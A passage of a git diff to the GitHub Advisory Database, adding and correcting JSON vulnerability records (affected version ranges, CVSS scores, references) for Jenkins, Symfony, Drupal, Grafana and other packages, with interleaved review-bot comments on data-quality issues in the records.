"https://jenkins.io/security/advisory/2018-07-30/#SECURITY-1001" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:12:23Z", + "nvd_published_at": "2018-08-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json b/advisories/github-reviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json new file mode 100644 index 0000000000000..351c1baf858f3 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json 
@@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-774g-r3fm-4v85", + "modified": "2024-01-30T22:39:23Z", + "published": "2022-05-17T00:29:02Z", + "aliases": [ + "CVE-2017-1000090" + ], + "summary": "CSRF vulnerability in Jenkins Role-based Authorization Strategy Plugin configuration", + "details": "Role-based Authorization Strategy Plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks. This allowed attackers to add administrator role to any user, or to remove the authorization configuration, preventing legitimate access to Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:role-strategy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.5.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000090" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:39:23Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json b/advisories/github-reviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json new file mode 100644 index 0000000000000..0d6360e12d43c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json 
@@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7f6w-fhmr-j8hq", + "modified": "2024-01-30T23:16:51Z", + "published": "2022-05-17T00:50:19Z", + "aliases": [ + "CVE-2014-9635" + ], + "summary": "Jenkins HttpOnly flag not Set for session cookies", + "details": "Jenkins before 1.586 does not set the HttpOnly flag in a Set-Cookie header for session cookies when run on Tomcat 7.0.41 or later, which makes it easier for remote attackers to obtain potentially sensitive information via script access to cookies.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.586" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9635" + }, + { + "type": "WEB", + "url": "https://github.com/jenkinsci/jenkins/commit/582128b9ac179a788d43c1478be8a5224dc19710" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=769682" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185151" + }, + { + "type": "WEB", + "url": "https://issues.jenkins-ci.org/browse/JENKINS-25019" + }, + { + "type": "WEB", + "url": "https://jenkins.io/changelog-old/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2015/01/22/3" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/72054" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:16:51Z", + "nvd_published_at": "2017-09-12T14:29:00Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json b/advisories/github-reviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json
new file mode 100644
index 0000000000000..11d41ea52c856
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json
@@ -0,0 +1,94 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7gfc-2v6g-6w9f", + "modified": "2024-02-08T15:52:06Z", + "published": "2022-05-17T05:45:29Z", + "aliases": [ + "CVE-2010-2477" + ], + "summary": "Paste is vulnerable to Cross-site Scripting via vectors involving a 404 status code", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in the paste.httpexceptions implementation in Paste before 1.7.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving a 404 status code, related to (1) paste.urlparser.StaticURLParser, (2) paste.urlparser.PkgResourcesParser, (3) paste.urlmap.URLMap, and (4) HTTPNotFound.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "paste" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.7.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2477" + }, + { + "type": "WEB", + "url": "https://github.com/cdent/paste/commit/4910493c62f369a3222357af09450930e4c93f5e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/cdent/paste" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111227133546/http://secunia.com/advisories/42500" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20120527154041/http://www.securityfocus.com/bid/41160" + }, + { + "type": "WEB", + "url": "http://bitbucket.org/ianb/paste/changeset/fcae59df8b56" + }, + { + "type": "WEB", + "url": "http://groups.google.com/group/paste-users/browse_thread/thread/3b3fff3dadd0b1e5?pli=1" + }, + { + "type": "WEB", + "url": "http://groups.google.com/group/pylons-discuss/msg/8c256dc076a408d8?dmode=source&output=gplain" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127785414818815&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127792576822169&w=2" + }, + { + "type": "WEB", + "url": 
"http://pylonshq.com/articles/archives/2010/6/paste_174_released_addresses_xss_security_hole" + }, + { + "type": "WEB", + "url": "http://www.ubuntu.com/usn/USN-1026-1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:52:05Z", + "nvd_published_at": "2010-11-06T00:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7gfx-wxfh-7rvm/GHSA-7gfx-wxfh-7rvm.json b/advisories/github-reviewed/2022/05/GHSA-7gfx-wxfh-7rvm/GHSA-7gfx-wxfh-7rvm.json index 940ff938abc97..5edfb70b9a230 100644 --- a/advisories/github-reviewed/2022/05/GHSA-7gfx-wxfh-7rvm/GHSA-7gfx-wxfh-7rvm.json +++ b/advisories/github-reviewed/2022/05/GHSA-7gfx-wxfh-7rvm/GHSA-7gfx-wxfh-7rvm.json @@ -60,6 +60,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/f9ca3c63d1250bb56b2bda609dcc9dd81f0065f8" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2018-13982.yaml" + }, { "type": "WEB", "url": "https://github.com/sbaresearch/advisories/tree/public/2018/SBA-ADV-20180420-01_Smarty_Path_Traversal" diff --git a/advisories/github-reviewed/2022/05/GHSA-7hwc-2cq4-6x2w/GHSA-7hwc-2cq4-6x2w.json b/advisories/github-reviewed/2022/05/GHSA-7hwc-2cq4-6x2w/GHSA-7hwc-2cq4-6x2w.json index da43ec9d32101..c8602e8615da6 100644 --- a/advisories/github-reviewed/2022/05/GHSA-7hwc-2cq4-6x2w/GHSA-7hwc-2cq4-6x2w.json +++ b/advisories/github-reviewed/2022/05/GHSA-7hwc-2cq4-6x2w/GHSA-7hwc-2cq4-6x2w.json 
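Review bot: The reference `http://bitbucket.org/ianb/paste/changeset/fcae59df8b56` points at a Mercurial changeset on Bitbucket, which stopped hosting Mercurial repositories in 2020, so this link is almost certainly dead; the commit is already reachable through the `https://github.com/cdent/paste/commit/4910493c…` entry above it, so the Bitbucket line could be dropped or replaced with an archive snapshot. The `http://pylonshq.com/articles/…` link is likely in the same state (hedged: I have not checked it) and the two `groups.google.com` and `marc.info` entries are plain HTTP where HTTPS is available. Also `github_reviewed_at` is `2024-02-08T15:52:05Z` while `modified` is `2024-02-08T15:52:06Z`; every other file in this commit has the two equal, so check whether the generator meant them to match. This record's hunk is split across two physical lines of the rendered diff (the `pylonshq.com` URL begins on the second), but the hunk itself is complete.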
@@ -109,6 +109,101 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] } ], "references": [ @@ -120,6 +215,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/b20e83562e32c56f8d9b8296ab07b0e4c0a54db8" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-bundle/CVE-2018-11408.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-11408.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -143,6 +246,10 @@ { "type": "WEB", "url": "https://symfony.com/blog/cve-2018-11408-open-redirect-vulnerability-on-security-handlers" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2018-11408" } ], "database_specific": { 
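Review bot: The five `symfony/security-bundle` ranges added in the first hunk cover 2.7.x, 2.8.x, 3.3.x, 3.4.x and 4.0.x only, so any 3.0.x, 3.1.x or 3.2.x release falls in no range and will be reported as unaffected by OSV-style matchers. Symfony's advisories normally state that end-of-life branches are affected but unfixed, and if that is the case here (I cannot confirm it from this page) those versions need their own entry, e.g. `{"introduced": "3.0.0"}, {"last_affected": "<last 3.2.x release>"}`, rather than being implied as safe by omission. Per-branch `introduced`/`fixed` pairs are otherwise the right shape for a multi-branch fix, and the added `symfony.com/cve-2018-11408` and FriendsOfPHP references look fine.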
diff --git a/advisories/github-reviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json b/advisories/github-reviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json new file mode 100644 index 0000000000000..c06c71778bd24 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m2x-qhrq-rp8h", + "modified": "2024-02-01T21:46:57Z", + "published": "2022-05-24T17:18:38Z", + "aliases": [ + "CVE-2020-13430" + ], + "summary": "Grafana XSS via the OpenTSDB datasource", + "details": "Grafana before 7.0.0 allows tag value XSS via the OpenTSDB datasource.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13430" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/24539" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/releases/tag/v7.0.0" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200528-0003/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:46:57Z", + "nvd_published_at": "2020-05-24T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json b/advisories/github-reviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json new file mode 100644 index 0000000000000..ea11741150684 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json 
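Review bot: The affected entry uses ecosystem `Go` with package `github.com/grafana/grafana` and `fixed: 7.0.0`; under Go module semantics a major version of 2 or higher is expected to live at a `/vN` import path, so tooling that applies those rules may never match a `7.0.0` fix against the bare path. As far as I know Grafana does not publish a `/v7` module and is consumed as a binary rather than a library, so this is a data-model limitation to confirm with the maintainers rather than an error you can fix in the hunk; a short note in the PR (or in `database_specific`) recording that the range is meant to be read against Grafana's release tags, not Go module versions, would save the next reviewer the same question. The CVSS vector scores 6.1, consistent with `MODERATE`, and the `fixed: 7.0.0` event matches the "before 7.0.0" wording.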
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mvg-cx9c-r6jm", + "modified": "2024-01-30T21:21:32Z", + "published": "2022-05-24T16:44:55Z", + "aliases": [ + "CVE-2019-10312" + ], + "summary": "Missing permission check in Jenkins Ansible Tower Plugin", + "details": "A missing permission check in Jenkins Ansible Tower Plugin 0.9.1 and earlier in the TowerInstallation.TowerInstallationDescriptor#doFillTowerCredentialsIdItems method allowed attackers with Overall/Read permission to enumerate credentials ID of credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:ansible-tower" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.9.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10312" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-30/#SECURITY-1355" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/30/5" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/108159" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:21:32Z", + "nvd_published_at": "2019-04-30T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json b/advisories/github-reviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json new file mode 100644 index 0000000000000..b48a90b9ff426 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json 
@@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p4p-v6hr-gp3m", + "modified": "2024-01-30T23:19:23Z", + "published": "2022-05-14T03:13:12Z", + "aliases": [ + "CVE-2018-1000196" + ], + "summary": "Jenkins Gitlab Hook Plugin stores and displays GitLab API token in plain text", + "details": "A exposure of sensitive information vulnerability exists in Jenkins Gitlab Hook Plugin 1.4.2 and older in gitlab_notifier.rb, views/gitlab_notifier/global.erb that allows attackers with local Jenkins master file system access or control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured Gitlab token.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.ruby-plugins:gitlab-hook" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.4.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000196" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-263" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:19:23Z", + "nvd_published_at": "2018-06-05T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7pr3-34rg-g53m/GHSA-7pr3-34rg-g53m.json b/advisories/github-reviewed/2022/05/GHSA-7pr3-34rg-g53m/GHSA-7pr3-34rg-g53m.json index 7baf1ecd890d2..74d7051d1c7c4 100644 --- a/advisories/github-reviewed/2022/05/GHSA-7pr3-34rg-g53m/GHSA-7pr3-34rg-g53m.json +++ b/advisories/github-reviewed/2022/05/GHSA-7pr3-34rg-g53m/GHSA-7pr3-34rg-g53m.json 
@@ -59,6 +59,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8140" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8140.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" diff --git a/advisories/github-reviewed/2022/05/GHSA-7w53-hfpw-rg3g/GHSA-7w53-hfpw-rg3g.json b/advisories/github-reviewed/2022/05/GHSA-7w53-hfpw-rg3g/GHSA-7w53-hfpw-rg3g.json index d5728103cd4c1..3143655cfea2e 100644 --- a/advisories/github-reviewed/2022/05/GHSA-7w53-hfpw-rg3g/GHSA-7w53-hfpw-rg3g.json +++ b/advisories/github-reviewed/2022/05/GHSA-7w53-hfpw-rg3g/GHSA-7w53-hfpw-rg3g.json @@ -22,7 +22,26 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0" + "introduced": "2.2.0-BETA1" + }, + { + "fixed": "2.2.0-BETA2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" }, { "fixed": "2.0.22" @@ -41,7 +60,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.1" + "introduced": "2.1.0" }, { "fixed": "2.1.7" @@ -53,17 +72,55 @@ { "package": { "ecosystem": "Packagist", - "name": "symfony/symfony" + "name": "symfony/yaml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.22" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/yaml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.1.0" + }, + { + "fixed": "2.1.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/yaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "2.2" + "introduced": "2.2.0-BETA1" }, { - "fixed": "2.2.12" + "fixed": "2.2.0-BETA2" } ] } 
@@ -75,14 +132,30 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1397" }, + { + "type": "WEB", + "url": "https://github.com/symfony/symfony/commit/ba6e3159c0eeb3b6e21db32fce8fa2535cb3aa77" + }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81551" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2013-1397.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/yaml/CVE-2013-1397.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" }, + { + "type": "WEB", + "url": "https://symfony.com/blog/security-release-symfony-2-0-22-and-2-1-7-released" + }, { "type": "WEB", "url": "http://secunia.com/advisories/51980" diff --git a/advisories/github-reviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json b/advisories/github-reviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json new file mode 100644 index 0000000000000..3781e781703fc --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w6p-rwhg-7h3g", + "modified": "2024-02-01T21:24:14Z", + "published": "2022-05-24T17:07:02Z", + "aliases": [ + "CVE-2020-6638" + ], + "summary": "Grin Insufficient Validation", + "details": "Grin through 2.1.1 has Insufficient Validation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "grin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6638" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-6638.md" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin/compare/v2.1.1...v3.0.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:24:14Z", + "nvd_published_at": "2020-01-21T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-836p-6p4j-35cg/GHSA-836p-6p4j-35cg.json b/advisories/github-reviewed/2022/05/GHSA-836p-6p4j-35cg/GHSA-836p-6p4j-35cg.json index 301105646a209..6024413c746ba 100644 --- a/advisories/github-reviewed/2022/05/GHSA-836p-6p4j-35cg/GHSA-836p-6p4j-35cg.json +++ b/advisories/github-reviewed/2022/05/GHSA-836p-6p4j-35cg/GHSA-836p-6p4j-35cg.json 
@@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0" + }, + { + "fixed": "8.0.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0" + }, + { + "fixed": "7.43" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0" + }, + { + "fixed": "6.38" + } + ] + } + ] } ], "references": [ @@ -78,6 +135,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-3164" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2016-3164.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2016-3164.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/drupal/drupal" diff --git a/advisories/github-reviewed/2022/05/GHSA-83c3-qx27-2rwr/GHSA-83c3-qx27-2rwr.json b/advisories/github-reviewed/2022/05/GHSA-83c3-qx27-2rwr/GHSA-83c3-qx27-2rwr.json index 77cbd988c9cbe..b210b0e613935 100644 --- a/advisories/github-reviewed/2022/05/GHSA-83c3-qx27-2rwr/GHSA-83c3-qx27-2rwr.json +++ b/advisories/github-reviewed/2022/05/GHSA-83c3-qx27-2rwr/GHSA-83c3-qx27-2rwr.json 
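Review bot: The new drupal/core entries use two-component lower bounds (`"introduced": "8.0"`, `"7.0"`, `"6.0"`) while the rest of this commit normalises Packagist bounds to three components (`"2.0"` → `"2.0.0"` in GHSA-83c3 and GHSA-89cp, `"8.0"` → `"8.0.0"` in GHSA-86hp). Mixed forms make version comparison depend on how the consumer pads missing components; `"8.0.0"`, `"7.0.0"` and `"6.0.0"` would match the convention the commit itself establishes. The entries are also listed 8, 7, 6 rather than ascending, which is harmless but differs from every other file in the change.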
@@ -12,6 +12,63 @@ ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.19" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/routing" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.19" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.19" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -22,10 +79,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0" + "introduced": "2.0.0" }, { - "fixed": "2.0.20" + "fixed": "2.0.19" } ] } @@ -45,6 +102,26 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/8b2c17f80377582287a78e0b521497e039dd6b0d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2012-6431.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/routing/CVE-2012-6431.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2012-6431.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2012-6431.yaml" + }, + { + "type": "WEB", + "url": "https://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released" + }, { "type": "WEB", "url": "http://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released" diff --git a/advisories/github-reviewed/2022/05/GHSA-85xw-3hp5-6fmc/GHSA-85xw-3hp5-6fmc.json b/advisories/github-reviewed/2022/05/GHSA-85xw-3hp5-6fmc/GHSA-85xw-3hp5-6fmc.json index 81f329d59d00d..a31eafae85cf4 100644 
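Review bot: The symfony/symfony 2.0 range is changed to `"fixed": "2.0.19"` and the three new component entries all end at 2.0.19, yet the only vendor reference kept for this advisory is the "security-release-symfony-2-0-20-and-2-1-5-released" post (added again here as https and retained as http two lines below), which names 2.0.20 as the fix release; one of the two is presumably wrong and should be checked against the commit 8b2c17f8 already referenced. Separately, the added `https://symfony.com/blog/...` reference duplicates the existing `http://symfony.com/blog/...` entry except for the scheme; the same scheme duplicate is introduced in GHSA-89cp-fvcc-hxh7 and a trailing-slash duplicate of `typo3-core-sa-2019-020` in GHSA-86hp-xrhj-fhpq, so dropping the older variant in each file would keep the reference lists de-duplicated.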
--- a/advisories/github-reviewed/2022/05/GHSA-85xw-3hp5-6fmc/GHSA-85xw-3hp5-6fmc.json
+++ b/advisories/github-reviewed/2022/05/GHSA-85xw-3hp5-6fmc/GHSA-85xw-3hp5-6fmc.json
@@ -59,10 +59,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8138"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8138.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/magento/magento2"
 },
+ {
+ "type": "WEB",
+ "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
